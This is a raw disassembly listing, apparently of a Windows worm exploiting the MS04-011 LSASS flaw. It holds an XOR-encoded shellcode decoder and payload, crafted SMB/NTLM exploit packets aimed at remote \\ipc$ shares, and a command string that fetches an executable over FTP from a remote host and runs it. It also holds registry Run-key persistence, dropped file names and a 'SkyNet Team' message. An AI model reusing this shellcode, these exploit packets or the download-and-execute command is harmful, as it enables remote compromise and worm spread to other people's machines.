align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_406F34�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+119�o
align 4
; char asc_40540C[]
asc_40540C db 0Ah ; DATA XREF: __NMSG_WRITE+F1�o
db 0Ah,0
align 10h
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+D3�o
db 0Ah
db 'Program: ',0
align 4
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+BF�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+7D�o
align 4
dword_405448 dd 2 dup(0) ; ___crtLCMapStringA+36�o
dword_405450 dd 0FFFFFFFFh, 403905h, 403909haGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+3D�o
align 10h
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+24�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+D�o
align 4
dword_405498 dd 0FFFFFFFFh, 4048FEh, 404902h, 0FFFFFFFFh, 4049B2h, 4049B6h
; DATA XREF: ___crtLCMapStringA+5�o
dd 562Ch, 2 dup(0)
dd 56A6h, 50F0h, 5554h, 2 dup(0)
dd 57D0h, 5018h, 5640h, 2 dup(0)
dd 57DEh, 5104h, 5638h, 2 dup(0)
dd 5806h, 50FCh, 553Ch, 2 dup(0)
dd 586Ah, 5000h, 567Ch, 2 dup(0)
dd 58ACh, 5140h, 5 dup(0)
dd 5812h, 5858h, 5840h, 5832h, 5820h, 0
dd 7C80BE01h, 7C834E64h, 7C838AE7h, 7C835406h, 7C8365A5h
dd 7C802442h, 7C8353CEh, 7C85E830h, 7C80B4CFh, 7C810637h
dd 7C86136Dh, 7C80C108h, 7C8098EBh, 7C910331h, 7C80E93Fh
dd 7C80929Ch, 7C8286EEh, 7C821363h, 7C801D77h, 7C9179FDh
dd 7C809A51h, 7C9105D4h, 7C8127A7h, 7C809915h, 7C812E76h
dd 7C80A490h, 7C838A0Ch, 7C809BF8h, 7C810D87h, 7C937A40h
dd 7C91043Dh, 7C809AE4h, 7C812BB6h, 7C810EF8h, 7C810E51h
dd 7C812F39h, 7C80CC97h, 7C80CCA8h, 7C80ADA0h, 7C838DE8h
dd 7C812F08h, 7C81CF5Bh, 7C80A0D4h, 7C814AE7h, 7C80B6A1h
dd 7C801EEEh, 7C812F1Dh, 7C8111DAh, 7C81CDDAh, 7C801E16h
dd 7C80DDF5h, 7C862E2Ah, 7C81DF77h, 0
dd 7E41A8ADh, 7E45058Ah, 0
dd 57EAh, 0
dd 80000073h, 80000002h, 8000000Dh, 80000001h, 80000010h
dd 80000013h, 80000009h, 80000017h, 80000004h, 80000003h
dd 80000039h, 8000000Ch, 8000000Bh, 80000034h, 0
dd 588Ah, 589Ah, 5878h, 0
dd 654D0000h, 67617373h, 786F4265h, 41h, 72707377h, 66746E69h
dd 53550041h, 32335245h, 6C6C642Eh, 0
aGetprocaddress db 'GetProcAddress',0
align 4
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 736C0000h, 70637274h
dd 4179h, 6C5F0000h, 736F6C63h, 65h, 72776C5Fh, 657469h
dd 6C5F0000h, 6565736Ch, 6Bh, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 4
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread db 'CreateThread',0
align 4
aWinexec db 'WinExec',0
dd 65530000h, 72685474h, 50646165h, 726F6972h, 797469h
dd 65470000h, 72754374h, 746E6572h, 65726854h, 6461h, 65470000h
dd 73614C74h, 72724574h, 726Fh, 72430000h, 65746165h, 6574754Dh
dd 4178h, 65470000h, 63695474h, 756F436Bh, 746Eh, 6F430000h
dd 69467970h, 41656Ch, 65470000h, 6E695774h, 73776F64h
dd 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h, 6C6C642Eh
dd 53570000h, 32335F32h, 6C6C642Eh, 0
aInternetgetcon db 'InternetGetConnectedState',0
aWininet_dll db 'WININET.dll',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 6C654467h, 56657465h, 65756C61h, 41h, 4F676552h
dd 4B6E6570h, 417965h, 62410000h, 5374726Fh, 65747379h
dd 7568536Dh, 776F6474h, 416Eh, 65520000h, 74655367h, 756C6156h
dd 41784565h, 44410000h, 49504156h, 642E3233h, 6C6Ch, 63490000h
dd 6C43706Dh, 4865736Fh, 6C646E61h, 65h, 706D6349h, 646E6553h
dd 6F686345h, 0
aIcmpcreatefile db 'IcmpCreateFile',0
align 4
aIphlpapi_dll db 'iphlpapi.dll',0
align 4
aGetmodulehandl db 'GetModuleHandleA',0
align 10h
aGetstartupinfo db 'GetStartupInfoA',0
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
dd 69737265h, 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentproc db 'GetCurrentProcess',0
align 4
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 4
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 5773676Eh, 0
aSethandlecount db 'SetHandleCount',0
align 10h
dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6C694674h
dd 70795465h, 65h, 70616548h, 74736544h, 796F72h, 65480000h
dd 72437061h, 65746165h, 0
aVirtualfree db 'VirtualFree',0
dd 65480000h, 72467061h, 6565h, 74520000h, 776E556Ch, 646E69h
dd 72570000h, 46657469h, 656C69h, 754D0000h, 4269746Ch
dd 54657479h, 6469576Fh, 61684365h, 72h, 53746547h, 6E697274h
dd 70795467h, 4165h, 65470000h, 72745374h, 54676E69h, 57657079h
dd 0
aGetcpinfo db 'GetCPInfo',0
align 4
aGetacp db 'GetACP',0
align 4
dd 65470000h, 4D454F74h, 5043h, 65480000h, 6C417061h, 636F6Ch
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 65480000h, 65527061h
dd 6F6C6C41h, 63h, 614D434Ch, 72745370h, 41676E69h, 0
aLcmapstringw db 'LCMapStringW',0
align 4
dd 143h dup(0)
dword_406000 dd 0 dword_406004 dd 0 dword_406008 dd 0 dd offset ___initmbctable
dd 0 ; DATA XREF: __cinit:loc_402BBC�o
dword_406014 dd 0 dword_406018 dd 0 dword_40601C dd 0 dword_406020 dd 4 dup(0) off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40126C+AA�r
; "echo off&echo open %s 1023>>cmd.ftp&ech"...
; char aI[]
aI db 'ë' ; DATA XREF: sub_401583+132�o
; sub_401583+1AB�o
; ---------------------------------------------------------------------------
adc [edx+4Ah], bl
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: .text:00406042�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
dw 0EBE8h
db 3 dup(0FFh)
; ---------------------------------------------------------------------------
loc_40604B: ; CODE XREF: .text:00406044�j
jo short near ptr dword_405AF4+4EEh
cwde
cdq
cdq
retn
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_401583+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_40137D+15D�o
; sub_401583+2BD�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40137D+188�o
; sub_401583+2EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_406304 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40137D+1AD�o
; sub_401583+315�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40137D+53�o
; sub_401583+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_40137D+85�o
; sub_401583+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_406448 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+369�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4064B4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+392�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401493+2 ; DATA XREF: sub_401583+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401583+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; sub_401583+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
; char *off_4068C8
off_4068C8 dd offset dword_406924 ; DATA XREF: sub_40219B:loc_4021F3�r
; sub_40219B+B6�r
dd offset dword_406918
; char *off_4068D0
off_4068D0 dd offset dword_406910 ; DATA XREF: sub_401B59+1A�r
; sub_401B59+2D�r
; char *off_4068D4
off_4068D4 dd offset dword_406908 ; DATA XREF: sub_401B59+77�r
; sub_401B59+84�r
; char *off_4068D8
off_4068D8 dd offset dword_406900 ; DATA XREF: sub_401B59+A8�r
; sub_401B59+B5�r
; char *off_4068DC
off_4068DC dd offset dword_4068F8 ; DATA XREF: sub_401B59+2C6�r
; sub_401B59+2D3�r ...
; char *off_4068E0
off_4068E0 dd offset dword_4068F0 ; DATA XREF: sub_401B59+184�r
; sub_401B59+191�r
; char *off_4068E4
off_4068E4 dd offset dword_4068E8 ; DATA XREF: sub_401B59+1B9�r
; sub_401B59+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fhdword_4068F0 dd 20303032h, 0A4B4Fhdword_4068F8 dd 20363232h, 0A4B4Fhdword_406900 dd 20303332h, 0A4B4Fhdword_406908 dd 20313333h, 0A4B4Fhdword_406910 dd 20303232h, 0A4B4Fhdword_406918 dd 5341534Ch, 56532053h, 52hdword_406924 dd 7361736Ch, 652E7373h, 6578haEchoOffEchoOpe db 'echo off&echo open %s 1023>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_upload.exe>>cmd.ftp&echo bye>>'
db 'cmd.ftp&echo on&ftp -s:cmd.ftp&%i_upload.exe&echo off&del cmd.ftp'
db '&echo on',0Ah,0
align 10h
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
; char Str[]
Str db 0Dh,0Ah,0 ; DATA XREF: sub_401210+40�o
align 10h
aCFtplog_txt db 'c:\ftplog.txt',0 ; DATA XREF: sub_401210+9�o
align 10h
aSC db '%s%c',0 ; DATA XREF: sub_40137D+1DF�o
align 4
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_40137D+20�o
; sub_401583+23�o
align 4
dword_406A34 dd 6EB06EBh, 0 dword_406A3C dd 1CEC8166h dword_406A40 dd 0E4FF07h ; char a5_0[]
a5_0 db '5.0',0 ; DATA XREF: sub_401A69+4A�o
; char SubStr[]
SubStr db '5.1',0 ; DATA XREF: sub_401A69+27�o
; char aQuit[]
aQuit db 'QUIT',0 ; DATA XREF: sub_401B59+2E4�o
align 4
; char aRetr[]
aRetr db 'RETR',0 ; DATA XREF: sub_401B59+1A2�o
align 4
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: sub_401B59+173�o
; sub_401F4B+79�o
word_406A68 dw 2Ch ; DATA XREF: sub_401B59+EE�r
align 4
; char aPort[]
aPort db 'PORT',0 ; DATA XREF: sub_401B59+C6�o
align 4
; char aPass[]
aPass db 'PASS',0 ; DATA XREF: sub_401B59+95�o
align 4
; char aUser[]
aUser db 'USER',0 ; DATA XREF: sub_401B59+64�o
align 4
; char asc_406A84[]
asc_406A84: ; DATA XREF: sub_401F4B+157�o
unicode 0, < >,0
a1_YourComputer db '1. Your computer is affected by the MS04-011 vulnerability',0Dh,0Ah
; DATA XREF: WinMain(x,x,x,x)+B2�o
db '2. It can be that dangerous computer viruses similar',0Dh,0Ah
db ' the Blaster worm infect your computer',0Dh,0Ah
db '3. Please update your computer with the MS04-011 LSASS patch',0Dh,0Ah
db ' from the www.microsoft.com website',0Dh,0Ah
db '4. This is an message from the SkyNet Team for',0Dh,0Ah
db ' malicious activity prevention',0Dh,0Ah,0
align 4
aSkynet db 'SkyNet',0 ; DATA XREF: WinMain(x,x,x,x)+AD�o
align 4
aSkynetnotice db 'SkynetNotice',0 ; DATA XREF: WinMain(x,x,x,x)+3F�o
align 4
aDrvddll_exe db 'Drvddll_exe',0 ; DATA XREF: sub_40219B+EB�o
aDrvsys_exe db 'drvsys.exe',0 ; DATA XREF: sub_40219B+DF�o
align 4
aSsgrate_exe db 'ssgrate.exe',0 ; DATA XREF: sub_40219B+CE�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_40219B+8B�o
align 10h
; char asc_406C50[]
asc_406C50: ; DATA XREF: sub_40219B+4B�o
unicode 0, <\>,0
align 10h
off_406C60 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_406C64 dd 2 ; __NMSG_WRITE+46�r
align 10h
off_406C70 dd offset __wctype+2 ; DATA XREF: _isalnum+1E�r
; __isctype+12�r ...
dd offset __wctype+2
public __wctype
; const unsigned __int16 _wctype[]
__wctype dd 200000h ; DATA XREF: _x_ismbbtype+18�r
; .text:off_406C70�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406E7C dd 1 dd 2Eh, 1
dword_406E88 dd 0C0000005h ; _xcptlookup+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406F00 dd 3 dword_406F04 dd 7 dword_406F08 dd 0Ah dword_406F0C dd 8Ch ; __XcptFilter+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406F1C dd 19930520h, 4 dup(0) ; __NLG_Notify+2�o
dword_406F30 dd 2 ; __NMSG_WRITE+28�r
off_406F34 dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+FC�r
; __NMSG_WRITE+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 405390h, 9, 405364h, 0Ah, 405340h, 10h, 405314h
dd 11h, 4052E4h, 12h, 4052C0h, 13h, 405294h, 18h, 40525Ch
dd 19h, 405234h, 1Ah, 4051FCh, 1Bh, 4051C4h, 1Ch, 40519Ch
dd 78h, 40518Ch, 79h, 40517Ch, 7Ah, 40516Ch, 0FCh, 406A0Ch
dd 0FFh, 40515Ch
byte_406FC0 db 1 ; DATA XREF: __NMSG_WRITE+1B�o
; __setmbcp+E1�r
db 2, 4, 8
align 8
dword_406FC8 dd 3A4h dd 82798260h, 21h, 0 ; DATA XREF: __setmbcp+11D�r
dword_406FD8 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h
dword_40707C dd 0 ; .text:00406638�o ...
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_4070B8 dd 3F8h ; __heap_alloc+5�r
align 10h
dword_4070C0 dd 0 ; sub_401000+10�w ...
dword_4070C4 dd 0 ; char Source[]
Source db 4 dup(0) ; DATA XREF: sub_40126C+89�o
; sub_40137D+C�o ...
dword_4070CC dd 0 ; char *dword_4070D0
dword_4070D0 dd 0 ; __setenvp:loc_402EA1�r ...
align 8
dword_4070D8 dd 0 ; _fast_error_exit�r ...
dd 3 dup(0)
dword_4070E8 dd 0 dword_4070EC dd 0 dword_4070F0 dd 0 dword_4070F4 dd 0 dword_4070F8 dd 0 dword_4070FC dd 0 dd 0
dword_407104 dd 0 dd 3 dup(0)
dword_407114 dd 0 dd 0
byte_40711C db 0 ; DATA XREF: _doexit+2D�w
align 10h
dword_407120 dd 0 dword_407124 dd 0 dword_407128 dd 0 ; __XcptFilter+46�w ...
dword_40712C dd 41h dup(0) dword_407230 dd 0 ; ___crtGetEnvironmentStringsA+23�w ...
dword_407234 dd 0 dword_407238 dd 0 ; ___crtGetStringTypeA:loc_403876�w
dword_40723C dd 0 ; _getSystemCP+4�w ...
dword_407240 dd 0 ; ___crtMessageBoxA+2E�w ...
dword_407244 dd 0 ; ___crtMessageBoxA:loc_4046B2�r
dword_407248 dd 0 ; ___crtMessageBoxA+60�r
dd 2 dup(0)
dword_407254 dd 0 dd 3 dup(0)
dword_407264 dd 0 ; _getSystemCP+3A�r ...
dd 0
dword_40726C dd 0 ; ___crtLCMapStringA+4C�w ...
dword_407270 dd 0 dword_407274 dd 0 dword_407278 dd 0 ; ___sbh_alloc_new_region+5�r ...
dword_40727C dd 0 ; ___sbh_free_block+259�r ...
dword_407280 dd 0 ; ___sbh_free_block+310�w ...
; void *Dst
Dst dd 0 ; DATA XREF: ___sbh_heap_init:loc_403E37�w
; ___sbh_free_block+22C�r ...
dword_407288 dd 0 ; ___sbh_find_block�r ...
dword_40728C dd 0 ; ___sbh_find_block+8�r ...
dword_407290 dd 0 ; __setmbcp+65�w ...
align 10h
dword_4072A0 dd 3 dup(0) ; __setmbcp+171�o ...
dword_4072AC dd 0 ; __setmbcp+15D�w ...
dd 4 dup(0)
byte_4072C0 db 0 ; DATA XREF: _setSBUpLow:loc_403CE2�w
; _setSBUpLow:loc_403CFF�w ...
align 4
dd 3Fh dup(0)
byte_4073C0 db 0 ; DATA XREF: __setmbcp+5C�o
; __setmbcp+AF�o ...
byte_4073C1 db 0 ; DATA XREF: _parse_cmdline+3F�r
; _parse_cmdline+84�r ...
align 4
dd 40h dup(0)
dword_4074C4 dd 0 ; __setmbcp+12B�w ...
dword_4074C8 dd 0 ; __heap_init+29�r ...
dd 5 dup(0)
dword_4074E0 dd 0 ; __ioinit+45�r ...
dword_4074E4 dd 3Fh dup(0) dword_4075E0 dd 0 ; __ioinit:loc_403351�r ...
dword_4075E4 dd 0 dword_4075E8 dd 0 dword_4075EC dd 0 dword_4075F0 dd 0 dword_4075F4 dd 0 dword_4075F8 dd 0 align 1000h
_text ends
; Section 3. (virtual address 0001F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0001F000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 41F000h
align 2000h
_idata2 ends
end start